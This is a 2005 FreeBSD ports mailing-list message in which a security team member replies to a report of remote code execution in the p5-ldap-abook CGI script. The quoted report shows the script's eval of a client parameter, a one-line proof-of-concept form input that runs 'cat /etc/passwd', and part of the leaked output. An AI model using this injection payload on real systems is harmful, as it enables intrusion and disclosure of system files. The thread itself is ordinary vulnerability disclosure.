FreeBSD Port: p5-ldap-abook-1.00
Simon L. Nielsen
simon at FreeBSD.org
Fri Nov 18 02:17:52 PST 2005
On 2005.11.18 12:55:20 +0300, Roman Mashirov wrote:
> This cgi script contains remote code exec. In the following code (line 128):
> my $attr = eval $query->param(entry);
> script directly evaluates cgi paramter, received form client, so <input
> type=hidden name=entry value="system 'cat /etc/passwd';"> leads to the
> following output from script:
>
> # $FreeBSD: src/etc/master.passwd,v 1.39 2004/08/01 21:33:47 markm Exp $
> # root:*:0:0:Charlie &:/root:/bin/csh
Yay! :-/
Have you tried to exploit it and verified that this exploit works? (I
don't see any input checking from a quick check but I cannot check
before tonight CET).
--
Simon L. Nielsen
FreeBSD Security Team
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 187 bytes
Desc: not available
Url : http://lists.freebsd.org/pipermail/freebsd-ports/attachments/20051118/72fa60a8/attachment.bin
More information about the freebsd-ports
mailing list